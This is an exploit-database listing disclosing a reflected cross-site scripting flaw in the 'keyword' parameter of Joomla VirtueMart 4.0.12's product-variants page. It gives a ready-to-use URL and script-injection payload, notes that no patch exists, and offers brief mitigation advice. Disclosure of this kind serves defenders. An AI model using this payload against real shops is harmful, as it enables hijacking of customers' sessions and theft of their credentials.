header-logo
Suggest Exploit
vendor:
VirtueMart Shopping-Cart
by:
CraCkEr
5.5
CVSS
MEDIUM
Reflected XSS
79
CWE
Product Name: VirtueMart Shopping-Cart
Affected Version From: 4.0.12
Affected Version To: 4.0.12
Patch Exists: NO
Related CWE:
CPE: a:virtuemart_team:virtuemart:4.0.12
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro
2023

Joomla VirtueMart Shopping-Cart 4.0.12 – Reflected XSS

The attacker can send a malicious URL containing an XSS payload to the victim, potentially allowing them to perform actions such as stealing session tokens or login credentials.

Mitigation:

Apply proper input validation and sanitization techniques to prevent the execution of malicious scripts.
Source

Exploit-DB raw data:

# Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 24/07/2023
# Vendor: VirtueMart Team
# Vendor Homepage: https://www.virtuemart.net/
# Software Link: https://demo.virtuemart.net/
# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/virtuemart/
# Version: 4.0.12
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site



## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob



## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials



Path: /product-variants

GET parameter 'keyword' is vulnerable to RXSS

https://website/product-variants?keyword=[XSS]&view=category&option=com_virtuemart&virtuemart_category_id=11&Itemid=925


[XSS Payload]: uk9ni"><script>alert(1)</script>a6di2



[-] Done